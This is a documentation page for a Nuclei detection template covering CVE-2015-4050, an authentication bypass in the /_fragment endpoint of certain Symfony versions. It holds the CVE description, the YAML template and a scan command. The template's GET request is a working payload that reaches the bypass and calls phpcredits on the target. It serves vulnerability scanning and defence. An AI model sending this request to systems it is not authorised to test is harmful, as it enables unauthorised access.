Skip to content
Nuclei Templates

Symfony - Authentication Bypass

ID: CVE-2015-4050

Severity: medium

Author: ELSFA7110,meme-lord

Tags: cve2015,cve,symfony,rce,sensiolabs

Description

Section titled “Description”

Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.

YAML Source

Section titled “YAML Source”
id: CVE-2015-4050


info:
  name: Symfony - Authentication Bypass
  author: ELSFA7110,meme-lord
  severity: medium
  description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Symfony.
  reference:
    - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
    - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
    - http://www.debian.org/security/2015/dsa-3276
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4050
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-4050
    cwe-id: CWE-284
    epss-score: 0.00598
    epss-percentile: 0.78364
    cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sensiolabs
    product: symfony
    shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony"
  tags: cve2015,cve,symfony,rce,sensiolabs


http:
  - method: GET
    path:
      - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Credits"


      - type: status
        status:
          - 200
# digest: 4b0a004830460221008722c62052fae98024fbbc65fddad835f9b92f6fba0968ca6908d5ae32ab0887022100b9094cac73fa66e5dca589bc980f70a6fade7a1fa19b9a70486491fc3735ce90:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-4050.yaml"

View on Github